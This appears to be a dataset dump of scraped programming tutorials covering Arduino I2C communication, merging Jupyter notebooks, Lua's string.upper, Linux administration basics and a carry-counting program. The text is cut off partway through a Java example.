title
stringlengths
3
221
text
stringlengths
17
477k
parsed
listlengths
0
3.17k
Arduino - Inter Integrated Circuit
Inter-integrated circuit (I2C) is a system for serial data exchange between the microcontrollers and specialized integrated circuits of a new generation. It is used when the distance between them is short (receiver and transmitter are usually on the same printed board). Connection is established via two conductors. One is used for data transfer and the other is used for synchronization (clock signal). As seen in the following figure, one device is always a master. It performs addressing of one slave chip before the communication starts. In this way, one microcontroller can communicate with 112 different devices. Baud rate is usually 100 Kb/sec (standard mode) or 10 Kb/sec (slow baud rate mode). Systems with the baud rate of 3.4 Mb/sec have recently appeared. The distance between devices, which communicate over an I2C bus is limited to several meters. The I2C bus consists of two signals − SCL and SDA. SCL is the clock signal, and SDA is the data signal. The current bus master always generates the clock signal. Some slave devices may force the clock low at times to delay the master sending more data (or to require more time to prepare data before the master attempts to clock it out). This is known as “clock stretching”. Following are the pins for different Arduino boards − Uno, Pro Mini A4 (SDA), A5 (SCL) Mega, Due 20 (SDA), 21 (SCL) Leonardo, Yun 2 (SDA), 3 (SCL) We have two modes - master code and slave code - to connect two Arduino boards using I2C. They are − Master Transmitter / Slave Receiver Master Receiver / Slave Transmitter Let us now see what is master transmitter and slave receiver. The following functions are used to initialize the Wire library and join the I2C bus as a master or slave. This is normally called only once. Wire.begin(address) − Address is the 7-bit slave address in our case as the master is not specified and it will join the bus as a master. Wire.begin(address) − Address is the 7-bit slave address in our case as the master is not specified and it will join the bus as a master. Wire.beginTransmission(address) − Begin a transmission to the I2C slave device with the given address. Wire.beginTransmission(address) − Begin a transmission to the I2C slave device with the given address. Wire.write(value) − Queues bytes for transmission from a master to slave device (in-between calls to beginTransmission() and endTransmission()). Wire.write(value) − Queues bytes for transmission from a master to slave device (in-between calls to beginTransmission() and endTransmission()). Wire.endTransmission() − Ends a transmission to a slave device that was begun by beginTransmission() and transmits the bytes that were queued by wire.write(). Wire.endTransmission() − Ends a transmission to a slave device that was begun by beginTransmission() and transmits the bytes that were queued by wire.write(). Example #include <Wire.h> //include wire library void setup() //this will run only once { Wire.begin(); // join i2c bus as master } short age = 0; void loop() { Wire.beginTransmission(2); // transmit to device #2 Wire.write("age is = "); Wire.write(age); // sends one byte Wire.endTransmission(); // stop transmitting delay(1000); } The following functions are used − Wire.begin(address) − Address is the 7-bit slave address. Wire.begin(address) − Address is the 7-bit slave address. Wire.onReceive(received data handler) − Function to be called when a slave device receives data from the master. Wire.onReceive(received data handler) − Function to be called when a slave device receives data from the master. Wire.available() − Returns the number of bytes available for retrieval with Wire.read().This should be called inside the Wire.onReceive() handler. Wire.available() − Returns the number of bytes available for retrieval with Wire.read().This should be called inside the Wire.onReceive() handler. Example #include <Wire.h> //include wire library void setup() { //this will run only once Wire.begin(2); // join i2c bus with address #2 Wire.onReceive(receiveEvent); // call receiveEvent when the master send any thing Serial.begin(9600); // start serial for output to print what we receive } void loop() { delay(250); } //-----this function will execute whenever data is received from master-----// void receiveEvent(int howMany) { while (Wire.available()>1) // loop through all but the last { char c = Wire.read(); // receive byte as a character Serial.print(c); // print the character } } Let us now see what is master receiver and slave transmitter. The Master, is programmed to request, and then read bytes of data that are sent from the uniquely addressed Slave Arduino. The following function is used − Wire.requestFrom(address,number of bytes) − Used by the master to request bytes from a slave device. The bytes may then be retrieved with the functions wire.available() and wire.read() functions. Example #include <Wire.h> //include wire library void setup() { Wire.begin(); // join i2c bus (address optional for master) Serial.begin(9600); // start serial for output } void loop() { Wire.requestFrom(2, 1); // request 1 bytes from slave device #2 while (Wire.available()) // slave may send less than requested { char c = Wire.read(); // receive a byte as character Serial.print(c); // print the character } delay(500); } The following function is used. Wire.onRequest(handler) − A function is called when a master requests data from this slave device. Example #include <Wire.h> void setup() { Wire.begin(2); // join i2c bus with address #2 Wire.onRequest(requestEvent); // register event } Byte x = 0; void loop() { delay(100); } // function that executes whenever data is requested by master // this function is registered as an event, see setup() void requestEvent() { Wire.write(x); // respond with message of 1 bytes as expected by master x++; } 65 Lectures 6.5 hours Amit Rana 43 Lectures 3 hours Amit Rana 20 Lectures 2 hours Ashraf Said 19 Lectures 1.5 hours Ashraf Said 11 Lectures 47 mins Ashraf Said 9 Lectures 41 mins Ashraf Said Print Add Notes Bookmark this page
[ { "code": null, "e": 3275, "s": 2870, "text": "Inter-integrated circuit (I2C) is a system for serial data exchange between the microcontrollers and specialized integrated circuits of a new generation. It is used when the distance between them is short (receiver and transmitter are usually on the same printed board). Connection is established via two conductors. One is used for data transfer and the other is used for synchronization (clock signal)." }, { "code": null, "e": 3733, "s": 3275, "text": "As seen in the following figure, one device is always a master. It performs addressing of one slave chip before the communication starts. In this way, one microcontroller can communicate with 112 different devices. Baud rate is usually 100 Kb/sec (standard mode) or 10 Kb/sec (slow baud rate mode). Systems with the baud rate of 3.4 Mb/sec have recently appeared. The distance between devices, which communicate over an I2C bus is limited to several meters." }, { "code": null, "e": 4108, "s": 3733, "text": "The I2C bus consists of two signals − SCL and SDA. SCL is the clock signal, and SDA is the data signal. The current bus master always generates the clock signal. Some slave devices may force the clock low at times to delay the master sending more data (or to require more time to prepare data before the master attempts to clock it out). This is known as “clock stretching”." }, { "code": null, "e": 4162, "s": 4108, "text": "Following are the pins for different Arduino boards −" }, { "code": null, "e": 4195, "s": 4162, "text": "Uno, Pro Mini A4 (SDA), A5 (SCL)" }, { "code": null, "e": 4224, "s": 4195, "text": "Mega, Due 20 (SDA), 21 (SCL)" }, { "code": null, "e": 4255, "s": 4224, "text": "Leonardo, Yun 2 (SDA), 3 (SCL)" }, { "code": null, "e": 4356, "s": 4255, "text": "We have two modes - master code and slave code - to connect two Arduino boards using I2C. They are −" }, { "code": null, "e": 4392, "s": 4356, "text": "Master Transmitter / Slave Receiver" }, { "code": null, "e": 4428, "s": 4392, "text": "Master Receiver / Slave Transmitter" }, { "code": null, "e": 4490, "s": 4428, "text": "Let us now see what is master transmitter and slave receiver." }, { "code": null, "e": 4632, "s": 4490, "text": "The following functions are used to initialize the Wire library and join the I2C bus as a master or slave. This is normally called only once." }, { "code": null, "e": 4770, "s": 4632, "text": "Wire.begin(address) − Address is the 7-bit slave address in our case as the master is not specified and it will join the bus as a master." }, { "code": null, "e": 4908, "s": 4770, "text": "Wire.begin(address) − Address is the 7-bit slave address in our case as the master is not specified and it will join the bus as a master." }, { "code": null, "e": 5011, "s": 4908, "text": "Wire.beginTransmission(address) − Begin a transmission to the I2C slave device with the given address." }, { "code": null, "e": 5114, "s": 5011, "text": "Wire.beginTransmission(address) − Begin a transmission to the I2C slave device with the given address." }, { "code": null, "e": 5259, "s": 5114, "text": "Wire.write(value) − Queues bytes for transmission from a master to slave device (in-between calls to beginTransmission() and endTransmission())." }, { "code": null, "e": 5404, "s": 5259, "text": "Wire.write(value) − Queues bytes for transmission from a master to slave device (in-between calls to beginTransmission() and endTransmission())." }, { "code": null, "e": 5563, "s": 5404, "text": "Wire.endTransmission() − Ends a transmission to a slave device that was begun by beginTransmission() and transmits the bytes that were queued by wire.write()." }, { "code": null, "e": 5722, "s": 5563, "text": "Wire.endTransmission() − Ends a transmission to a slave device that was begun by beginTransmission() and transmits the bytes that were queued by wire.write()." }, { "code": null, "e": 5730, "s": 5722, "text": "Example" }, { "code": null, "e": 6087, "s": 5730, "text": "#include <Wire.h> //include wire library\n\nvoid setup() //this will run only once { \n Wire.begin(); // join i2c bus as master\n} \n\nshort age = 0; \n\nvoid loop() { \n Wire.beginTransmission(2); \n // transmit to device #2\n Wire.write(\"age is = \");\n Wire.write(age); // sends one byte\n Wire.endTransmission(); // stop transmitting\n delay(1000); \n}" }, { "code": null, "e": 6122, "s": 6087, "text": "The following functions are used −" }, { "code": null, "e": 6180, "s": 6122, "text": "Wire.begin(address) − Address is the 7-bit slave address." }, { "code": null, "e": 6238, "s": 6180, "text": "Wire.begin(address) − Address is the 7-bit slave address." }, { "code": null, "e": 6351, "s": 6238, "text": "Wire.onReceive(received data handler) − Function to be called when a slave device receives data from the master." }, { "code": null, "e": 6464, "s": 6351, "text": "Wire.onReceive(received data handler) − Function to be called when a slave device receives data from the master." }, { "code": null, "e": 6611, "s": 6464, "text": "Wire.available() − Returns the number of bytes available for retrieval with Wire.read().This should be called inside the Wire.onReceive() handler." }, { "code": null, "e": 6758, "s": 6611, "text": "Wire.available() − Returns the number of bytes available for retrieval with Wire.read().This should be called inside the Wire.onReceive() handler." }, { "code": null, "e": 6766, "s": 6758, "text": "Example" }, { "code": null, "e": 7392, "s": 6766, "text": "#include <Wire.h> //include wire library\n\nvoid setup() { //this will run only once\n Wire.begin(2); // join i2c bus with address #2\n Wire.onReceive(receiveEvent); // call receiveEvent when the master send any thing \n Serial.begin(9600); // start serial for output to print what we receive \n}\n\nvoid loop() { \n delay(250); \n}\n\n//-----this function will execute whenever data is received from master-----//\n\nvoid receiveEvent(int howMany) { \n while (Wire.available()>1) // loop through all but the last {\n char c = Wire.read(); // receive byte as a character\n Serial.print(c); // print the character\n }\n}" }, { "code": null, "e": 7454, "s": 7392, "text": "Let us now see what is master receiver and slave transmitter." }, { "code": null, "e": 7577, "s": 7454, "text": "The Master, is programmed to request, and then read bytes of data that are sent from the uniquely addressed Slave Arduino." }, { "code": null, "e": 7610, "s": 7577, "text": "The following function is used −" }, { "code": null, "e": 7806, "s": 7610, "text": "Wire.requestFrom(address,number of bytes) − Used by the master to request bytes from a slave device. The bytes may then be retrieved with the functions wire.available() and wire.read() functions." }, { "code": null, "e": 7814, "s": 7806, "text": "Example" }, { "code": null, "e": 8268, "s": 7814, "text": "#include <Wire.h> //include wire library void setup() { \n Wire.begin(); // join i2c bus (address optional for master) \n Serial.begin(9600); // start serial for output\n} \n\nvoid loop() { \n Wire.requestFrom(2, 1); // request 1 bytes from slave device #2\n while (Wire.available()) // slave may send less than requested {\n char c = Wire.read(); // receive a byte as character\n Serial.print(c); // print the character\n } \n delay(500); \n}" }, { "code": null, "e": 8300, "s": 8268, "text": "The following function is used." }, { "code": null, "e": 8399, "s": 8300, "text": "Wire.onRequest(handler) − A function is called when a master requests data from this slave device." }, { "code": null, "e": 8407, "s": 8399, "text": "Example" }, { "code": null, "e": 8825, "s": 8407, "text": "#include <Wire.h> \n\nvoid setup() { \n Wire.begin(2); // join i2c bus with address #2\n Wire.onRequest(requestEvent); // register event\n} \n\nByte x = 0;\n\nvoid loop() { \n delay(100); \n} \n\n// function that executes whenever data is requested by master\n// this function is registered as an event, see setup()\n\nvoid requestEvent() { \n Wire.write(x); // respond with message of 1 bytes as expected by master\n x++; \n}" }, { "code": null, "e": 8860, "s": 8825, "text": "\n 65 Lectures \n 6.5 hours \n" }, { "code": null, "e": 8871, "s": 8860, "text": " Amit Rana" }, { "code": null, "e": 8904, "s": 8871, "text": "\n 43 Lectures \n 3 hours \n" }, { "code": null, "e": 8915, "s": 8904, "text": " Amit Rana" }, { "code": null, "e": 8948, "s": 8915, "text": "\n 20 Lectures \n 2 hours \n" }, { "code": null, "e": 8961, "s": 8948, "text": " Ashraf Said" }, { "code": null, "e": 8996, "s": 8961, "text": "\n 19 Lectures \n 1.5 hours \n" }, { "code": null, "e": 9009, "s": 8996, "text": " Ashraf Said" }, { "code": null, "e": 9041, "s": 9009, "text": "\n 11 Lectures \n 47 mins\n" }, { "code": null, "e": 9054, "s": 9041, "text": " Ashraf Said" }, { "code": null, "e": 9085, "s": 9054, "text": "\n 9 Lectures \n 41 mins\n" }, { "code": null, "e": 9098, "s": 9085, "text": " Ashraf Said" }, { "code": null, "e": 9105, "s": 9098, "text": " Print" }, { "code": null, "e": 9116, "s": 9105, "text": " Add Notes" } ]
Tryit Editor v3.6 - Show Python
#if this page is executed with no errors, you have the "pymongo" module installed.
[]
How To Easily Merge Multiple Jupyter Notebooks Into One | by Amal Hasni | Towards Data Science
Written by: Amal Hasni & Dhia Hmila Juypyter Notebooks are very essential tools for Data Scientists. They offer multiple practical options for interactive computing as they combine code, text, and visualizations in a single document. It is common to choose to use multiple separate Notebooks in a single project for organizational purposes. The problem is when a manager or a client asks for a quick demo and you need to merge your different Notebooks quickly, reorganizing cells can be a long tedious sequence of copy-paste. Since Jupyter’s interface doesn’t make it easy, we thought It’s time to create our own solution. In this article, we will show you how to reorganize and concatenate two notebooks in a time-efficient way. What you’ll learn will allow you to reorganize, filter, change the notebook’s cell using python code. Table Of Contents:· Getting to know Notebooks’s structure· Concatenating Notebooks· Going further with nbformat I don’t know if you’ve ever tried to open a Jupyter notebook file (that has .ipynb as an extension) with a text editor. If you did, you’ve either seen weird gibberish or you’ve recognized the JSON format. If you don’t know what the JSON format is, it stands for JavaScript Object Notation and is a way to store objects/data in a human-readable way. It’s quite neat and simple (you can learn more about this here ). So like I’ve said IPYNB files are stored in the JSON plain text format and if you open one up, it will look like this: As you can see, it’s a well-structured dictionary containing: metadata: basically, a dictionary containing information about the kernel and language that are used ( and more ). nbformat and nbformat_minor: These are just the notebook format version (here it’s 4.0) cells: This is what we’ll, most likely, be interested in and it contains a list of the notebook cells. Each cell is represented by a similar dictionary containing different key-value pairs: You can see in this screenshot where each field goes: Now you know enough to start playing with the notebook’s cells. But, if you want to go more into details, you can check out the documentation at this link. So the practical example we chose is merging two notebooks together. It’s a fairly simple example but you’ll get to see how to read, write and tweak the notebooks, and depending on your use case, you can adapt the code to your needs. If you want, you can download example notebooks to try the code at this link. So let’s start by implementing a function to read IPYNB files. We’ll use the json module included in python's standard library: Now reading the files only takes two lines of code: first_notebook = read_ipynb('first_notebook.ipynb')second_notebook = read_ipynb('second_notebook.ipynb') Though we probably don’t necessarily need to copy the notebook in this example, it may come in handy if you want to play around with the notebooks. Here, again, we’ll use the copy module of the standard library: import copyfinal_notebook = copy.deepcopy(first_notebook) So here comes the part where we actually merge the cells: final_notebook['cells'] = first_notebook['cells'] + second_notebook['cells'] And finally, let’s write a helper function to export the notebook into the Jupyter Notebook format and export our final_notebook with it: The Jupyter Development Team gave us the package nbformat to make similar operations such as reading ipynb files or creating new code cells with nbformat.v4.new_code_cell . To have an example, let’s reproduce the equivalent code to concatenate two notebooks with nbformat: If you want a more exhaustive list of functions provided by nbformat, you can check out their documentation in the following link. Taking a deeper look at the structure of a Jupyter Notebook gives the necessary knowledge to create solutions for cell manipulation. This article details two solutions that give you a workaround for the tedious copy-pasting you’ll normally need to merge two Notebooks into one. You’ll find all the code used in this article in this Github repository. Depending on your use case, you can go further and create scripts to make other modifications you need in an automatic, time-efficient way. We hope you found this article useful. Thank you for sticking around this far, stay safe and we will see you in our next article 😊!
[ { "code": null, "e": 208, "s": 172, "text": "Written by: Amal Hasni & Dhia Hmila" }, { "code": null, "e": 698, "s": 208, "text": "Juypyter Notebooks are very essential tools for Data Scientists. They offer multiple practical options for interactive computing as they combine code, text, and visualizations in a single document. It is common to choose to use multiple separate Notebooks in a single project for organizational purposes. The problem is when a manager or a client asks for a quick demo and you need to merge your different Notebooks quickly, reorganizing cells can be a long tedious sequence of copy-paste." }, { "code": null, "e": 1004, "s": 698, "text": "Since Jupyter’s interface doesn’t make it easy, we thought It’s time to create our own solution. In this article, we will show you how to reorganize and concatenate two notebooks in a time-efficient way. What you’ll learn will allow you to reorganize, filter, change the notebook’s cell using python code." }, { "code": null, "e": 1116, "s": 1004, "text": "Table Of Contents:· Getting to know Notebooks’s structure· Concatenating Notebooks· Going further with nbformat" }, { "code": null, "e": 1321, "s": 1116, "text": "I don’t know if you’ve ever tried to open a Jupyter notebook file (that has .ipynb as an extension) with a text editor. If you did, you’ve either seen weird gibberish or you’ve recognized the JSON format." }, { "code": null, "e": 1531, "s": 1321, "text": "If you don’t know what the JSON format is, it stands for JavaScript Object Notation and is a way to store objects/data in a human-readable way. It’s quite neat and simple (you can learn more about this here )." }, { "code": null, "e": 1650, "s": 1531, "text": "So like I’ve said IPYNB files are stored in the JSON plain text format and if you open one up, it will look like this:" }, { "code": null, "e": 1712, "s": 1650, "text": "As you can see, it’s a well-structured dictionary containing:" }, { "code": null, "e": 1827, "s": 1712, "text": "metadata: basically, a dictionary containing information about the kernel and language that are used ( and more )." }, { "code": null, "e": 1915, "s": 1827, "text": "nbformat and nbformat_minor: These are just the notebook format version (here it’s 4.0)" }, { "code": null, "e": 2018, "s": 1915, "text": "cells: This is what we’ll, most likely, be interested in and it contains a list of the notebook cells." }, { "code": null, "e": 2105, "s": 2018, "text": "Each cell is represented by a similar dictionary containing different key-value pairs:" }, { "code": null, "e": 2159, "s": 2105, "text": "You can see in this screenshot where each field goes:" }, { "code": null, "e": 2315, "s": 2159, "text": "Now you know enough to start playing with the notebook’s cells. But, if you want to go more into details, you can check out the documentation at this link." }, { "code": null, "e": 2549, "s": 2315, "text": "So the practical example we chose is merging two notebooks together. It’s a fairly simple example but you’ll get to see how to read, write and tweak the notebooks, and depending on your use case, you can adapt the code to your needs." }, { "code": null, "e": 2627, "s": 2549, "text": "If you want, you can download example notebooks to try the code at this link." }, { "code": null, "e": 2755, "s": 2627, "text": "So let’s start by implementing a function to read IPYNB files. We’ll use the json module included in python's standard library:" }, { "code": null, "e": 2807, "s": 2755, "text": "Now reading the files only takes two lines of code:" }, { "code": null, "e": 2912, "s": 2807, "text": "first_notebook = read_ipynb('first_notebook.ipynb')second_notebook = read_ipynb('second_notebook.ipynb')" }, { "code": null, "e": 3124, "s": 2912, "text": "Though we probably don’t necessarily need to copy the notebook in this example, it may come in handy if you want to play around with the notebooks. Here, again, we’ll use the copy module of the standard library:" }, { "code": null, "e": 3182, "s": 3124, "text": "import copyfinal_notebook = copy.deepcopy(first_notebook)" }, { "code": null, "e": 3240, "s": 3182, "text": "So here comes the part where we actually merge the cells:" }, { "code": null, "e": 3317, "s": 3240, "text": "final_notebook['cells'] = first_notebook['cells'] + second_notebook['cells']" }, { "code": null, "e": 3455, "s": 3317, "text": "And finally, let’s write a helper function to export the notebook into the Jupyter Notebook format and export our final_notebook with it:" }, { "code": null, "e": 3628, "s": 3455, "text": "The Jupyter Development Team gave us the package nbformat to make similar operations such as reading ipynb files or creating new code cells with nbformat.v4.new_code_cell ." }, { "code": null, "e": 3728, "s": 3628, "text": "To have an example, let’s reproduce the equivalent code to concatenate two notebooks with nbformat:" }, { "code": null, "e": 3859, "s": 3728, "text": "If you want a more exhaustive list of functions provided by nbformat, you can check out their documentation in the following link." }, { "code": null, "e": 4210, "s": 3859, "text": "Taking a deeper look at the structure of a Jupyter Notebook gives the necessary knowledge to create solutions for cell manipulation. This article details two solutions that give you a workaround for the tedious copy-pasting you’ll normally need to merge two Notebooks into one. You’ll find all the code used in this article in this Github repository." }, { "code": null, "e": 4350, "s": 4210, "text": "Depending on your use case, you can go further and create scripts to make other modifications you need in an automatic, time-efficient way." } ]
string.upper() function in Lua programming
There are certain scenarios in our code that when we are working with the strings, we might want some string to be in uppercase, like consider a very basic and yet famous example of such scenario, the PAN number. Imagine that you are making a web form in which there’s a field for the PAN number of the user, and since you know that PAN number can’t be in lowercases, we need to take the user input of that field and convert the string into its uppercase. Converting a string to its uppercase in Lua is done by the string.upper() function. string.upper(s) In the above syntax, the identifier s denotes the string which we are trying to convert into its uppercase. Let’s consider a very simple example of the same, where we will convert a string literal into its uppercase. Consider the example shown below − Live Demo s = string.upper("abc") print(s) ABC An important point to note about the string.upper() function is that it doesn’t modify the original string, it just does the modification to a copy of it and returns that copy. Let’s explore this particular case with the help of an example. Consider the example shown below − Live Demo s = "abc" s1 = string.upper("abc") print(s) print(s1) abc ABC Also, if a string is already in its uppercase form then nothing will change. Consider the example shown below − Live Demo s = "A" string.upper("A") print(s) A
[ { "code": null, "e": 1275, "s": 1062, "text": "There are certain scenarios in our code that when we are working with the strings, we might want some string to be in uppercase, like consider a very basic and yet famous example of such scenario, the PAN number." }, { "code": null, "e": 1518, "s": 1275, "text": "Imagine that you are making a web form in which there’s a field for the PAN number of the user, and since you know that PAN number can’t be in lowercases, we need to take the user input of that field and convert the string into its uppercase." }, { "code": null, "e": 1602, "s": 1518, "text": "Converting a string to its uppercase in Lua is done by the string.upper() function." }, { "code": null, "e": 1618, "s": 1602, "text": "string.upper(s)" }, { "code": null, "e": 1726, "s": 1618, "text": "In the above syntax, the identifier s denotes the string which we are trying to convert into its uppercase." }, { "code": null, "e": 1835, "s": 1726, "text": "Let’s consider a very simple example of the same, where we will convert a string literal into its uppercase." }, { "code": null, "e": 1870, "s": 1835, "text": "Consider the example shown below −" }, { "code": null, "e": 1881, "s": 1870, "text": " Live Demo" }, { "code": null, "e": 1914, "s": 1881, "text": "s = string.upper(\"abc\")\nprint(s)" }, { "code": null, "e": 1918, "s": 1914, "text": "ABC" }, { "code": null, "e": 2159, "s": 1918, "text": "An important point to note about the string.upper() function is that it doesn’t modify the original string, it just does the modification to a copy of it and returns that copy. Let’s explore this particular case with the help of an example." }, { "code": null, "e": 2194, "s": 2159, "text": "Consider the example shown below −" }, { "code": null, "e": 2205, "s": 2194, "text": " Live Demo" }, { "code": null, "e": 2259, "s": 2205, "text": "s = \"abc\"\ns1 = string.upper(\"abc\")\nprint(s)\nprint(s1)" }, { "code": null, "e": 2267, "s": 2259, "text": "abc\nABC" }, { "code": null, "e": 2344, "s": 2267, "text": "Also, if a string is already in its uppercase form then nothing will change." }, { "code": null, "e": 2379, "s": 2344, "text": "Consider the example shown below −" }, { "code": null, "e": 2390, "s": 2379, "text": " Live Demo" }, { "code": null, "e": 2425, "s": 2390, "text": "s = \"A\"\nstring.upper(\"A\")\nprint(s)" }, { "code": null, "e": 2427, "s": 2425, "text": "A" } ]
Beginner's Guide to Linux System Administration - GeeksforGeeks
23 Aug, 2021 A Linux System Administrator manages the operations such as maintaining proper software, observing them, and even taking care of backup and hardware systems. It is recommended that before reading this article please go through the article What is Linux System Administration. Here we have some basics of Linux System Administration. Set the Hostname: Open terminal and enter the following command in order to change the hostname. sudo hostname your_hostname Replace “your_hostname” with the hostname that you want to keep. Setting up the time zone: Move to /usr/share/zoneinfo/your_zone and then link the zone file with /etc/localtime to set the time zone. sudo ln -sf Kolkata /etc/localtime Managing files is the most important task in Linux as all devices, directories, and packages are just a type of file in Linux. 1. To know about File system read the article File System in Linux. 2. To learn more about Linux file hierarchy structure you can read the article Linux File System Hierarchy 3. To get the difference between Linux and Windows File System read the article Windows vs Linux Below is the list of some file management commands in Linux: You can also read the file management in Linux from the article https://www.geeksforgeeks.org/file-management-in-linux/ Networking commands play an important role in system Administration and a good system Administrator must have good hands-on networking commands. Here is a list of such commands that are mostly used for networking in Linux. To learn more about Linux networking commands then read the article Linux Networking Tools A system administrator has to manage the users working on the system. Users are the accounts which are logged in to your system or may log in to the system. Each user in Linux has a unique UID to identify the user. All information of the users is stored in /etc/passwd file and all hashed passwords are stored in /etc/shadow file. There are basically 2 types of user in Linux on the basis of their rights to access. Superuser or Administrator General users Each user may or may not be a part of a group which is a collection of users. To learn more about users in Linux go through the article Users in Linux System Administration. Here is a list of commands that are used to manage users. To learn more about how to manage users read the article User Management in Linux To learn more about how to manage groups read the article Group Management in Linux A System Administrator should be able to diagnose problems in a system and even to monitor the performance of the system so that it may be improved. Here is the list of some useful commands for the same. A good system Administrator must have an idea of how to read and manage logs as they give a lot of crucial and required information. ruhelaa48 Linux-system-commands Linux-Unix Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here. TCP Server-Client implementation in C ZIP command in Linux with examples tar command in Linux with examples SORT command in Linux/Unix with examples curl command in Linux with Examples 'crontab' in Linux with Examples UDP Server-Client implementation in C Conditional Statements | Shell Script diff command in Linux with examples Cat command in Linux with examples
[ { "code": null, "e": 24636, "s": 24608, "text": "\n23 Aug, 2021" }, { "code": null, "e": 24970, "s": 24636, "text": "A Linux System Administrator manages the operations such as maintaining proper software, observing them, and even taking care of backup and hardware systems. It is recommended that before reading this article please go through the article What is Linux System Administration. Here we have some basics of Linux System Administration. " }, { "code": null, "e": 25069, "s": 24970, "text": "Set the Hostname: Open terminal and enter the following command in order to change the hostname. " }, { "code": null, "e": 25097, "s": 25069, "text": "sudo hostname your_hostname" }, { "code": null, "e": 25163, "s": 25097, "text": "Replace “your_hostname” with the hostname that you want to keep. " }, { "code": null, "e": 25299, "s": 25163, "text": "Setting up the time zone: Move to /usr/share/zoneinfo/your_zone and then link the zone file with /etc/localtime to set the time zone. " }, { "code": null, "e": 25334, "s": 25299, "text": "sudo ln -sf Kolkata /etc/localtime" }, { "code": null, "e": 25462, "s": 25334, "text": "Managing files is the most important task in Linux as all devices, directories, and packages are just a type of file in Linux. " }, { "code": null, "e": 25735, "s": 25462, "text": "1. To know about File system read the article File System in Linux. 2. To learn more about Linux file hierarchy structure you can read the article Linux File System Hierarchy 3. To get the difference between Linux and Windows File System read the article Windows vs Linux " }, { "code": null, "e": 25798, "s": 25735, "text": "Below is the list of some file management commands in Linux: " }, { "code": null, "e": 25920, "s": 25798, "text": "You can also read the file management in Linux from the article https://www.geeksforgeeks.org/file-management-in-linux/ " }, { "code": null, "e": 26144, "s": 25920, "text": "Networking commands play an important role in system Administration and a good system Administrator must have good hands-on networking commands. Here is a list of such commands that are mostly used for networking in Linux. " }, { "code": null, "e": 26237, "s": 26144, "text": "To learn more about Linux networking commands then read the article Linux Networking Tools " }, { "code": null, "e": 26655, "s": 26237, "text": "A system administrator has to manage the users working on the system. Users are the accounts which are logged in to your system or may log in to the system. Each user in Linux has a unique UID to identify the user. All information of the users is stored in /etc/passwd file and all hashed passwords are stored in /etc/shadow file. There are basically 2 types of user in Linux on the basis of their rights to access. " }, { "code": null, "e": 26682, "s": 26655, "text": "Superuser or Administrator" }, { "code": null, "e": 26696, "s": 26682, "text": "General users" }, { "code": null, "e": 26929, "s": 26696, "text": "Each user may or may not be a part of a group which is a collection of users. To learn more about users in Linux go through the article Users in Linux System Administration. Here is a list of commands that are used to manage users. " }, { "code": null, "e": 27012, "s": 26929, "text": "To learn more about how to manage users read the article User Management in Linux " }, { "code": null, "e": 27097, "s": 27012, "text": "To learn more about how to manage groups read the article Group Management in Linux " }, { "code": null, "e": 27302, "s": 27097, "text": "A System Administrator should be able to diagnose problems in a system and even to monitor the performance of the system so that it may be improved. Here is the list of some useful commands for the same. " }, { "code": null, "e": 27436, "s": 27302, "text": "A good system Administrator must have an idea of how to read and manage logs as they give a lot of crucial and required information. " }, { "code": null, "e": 27448, "s": 27438, "text": "ruhelaa48" }, { "code": null, "e": 27470, "s": 27448, "text": "Linux-system-commands" }, { "code": null, "e": 27481, "s": 27470, "text": "Linux-Unix" }, { "code": null, "e": 27579, "s": 27481, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 27617, "s": 27579, "text": "TCP Server-Client implementation in C" }, { "code": null, "e": 27652, "s": 27617, "text": "ZIP command in Linux with examples" }, { "code": null, "e": 27687, "s": 27652, "text": "tar command in Linux with examples" }, { "code": null, "e": 27728, "s": 27687, "text": "SORT command in Linux/Unix with examples" }, { "code": null, "e": 27764, "s": 27728, "text": "curl command in Linux with Examples" }, { "code": null, "e": 27797, "s": 27764, "text": "'crontab' in Linux with Examples" }, { "code": null, "e": 27835, "s": 27797, "text": "UDP Server-Client implementation in C" }, { "code": null, "e": 27873, "s": 27835, "text": "Conditional Statements | Shell Script" }, { "code": null, "e": 27909, "s": 27873, "text": "diff command in Linux with examples" } ]
Count the number of carry operations required to add two numbers - GeeksforGeeks
29 Oct, 2021 Given two numbers, the task is to find the number of carry operations required when two numbers are added as below. 1234 + 5678 ——– 6912 ——– Examples: Input: n = 1234, k = 5678 Output: 2 4+8 = 2 and carry 1 carry+3+7 = carry 1 carry+2+6 = 9, carry 0 carry+1+5 = 6 Input: n = 555, k = 555 Output: 3 Approach: Store the values of n and k in strings. Initialize the carry variable and count variable to 0.Now, check from the last index of the strings till both the strings come to an end(one string may be smaller than the other).Add both the values(take care of ascii value) with carry in every iteration and check if that sum is greater than 10 or not.If it is greater than 10 then simply increment the value of count by 1 and make carry equal to 1, else make carry equal to 0.At last, print your answer which is count. Initialize the carry variable and count variable to 0. Now, check from the last index of the strings till both the strings come to an end(one string may be smaller than the other). Add both the values(take care of ascii value) with carry in every iteration and check if that sum is greater than 10 or not. If it is greater than 10 then simply increment the value of count by 1 and make carry equal to 1, else make carry equal to 0. At last, print your answer which is count. Below is the implementation of above approach: C++ Java Python3 C# PHP Javascript // C++ implementation of above approach#include <bits/stdc++.h>using namespace std; // Function to count the number of// carry operationsint count_carry(string a, string b){ // Initialize the value of carry to 0 int carry = 0; // Counts the number of carry operations int count = 0; // Initialize len_a and len_b with the sizes of strings int len_a = a.length(), len_b = b.length(); while (len_a != 0 || len_b != 0) { // Assigning the ascii value of the character int x = 0, y = 0; if (len_a > 0) { x = a[len_a - 1] - '0'; len_a--; } if (len_b > 0) { y = b[len_b - 1] - '0'; len_b--; } // Add both numbers/digits int sum = x + y + carry; // If sum > 0, increment count // and set carry to 1 if (sum >= 10) { carry = 1; count++; } // Else, set carry to 0 else carry = 0; } return count;} // Driver codeint main(){ string a = "9555", b = "555"; int count = count_carry(a, b); if (count == 0) cout << "0\n"; else if (count == 1) cout << "1\n"; else cout << count << "\n"; return 0;} // Java implementation of // above approachimport java.io.*; class GFG { // Function to count the number // of carry operationsstatic int count_carry(String a, String b){ // Initialize the value // of carry to 0 int carry = 0; // Counts the number of // carry operations int count = 0; // Initialize len_a and len_b // with the sizes of strings int len_a = a.length(), len_b = b.length(); while (len_a != 0 || len_b != 0) { // Assigning the ascii value // of the character int x = 0, y = 0; if (len_a > 0) { x = a.charAt(len_a - 1) - '0'; len_a--; } if (len_b > 0) { y = b.charAt(len_b - 1) - '0'; len_b--; } // Add both numbers/digits int sum = x + y + carry; // If sum > 0, increment count // and set carry to 1 if (sum >= 10) { carry = 1; count++; } // Else, set carry to 0 else carry = 0; } return count;} // Driver codepublic static void main (String[] 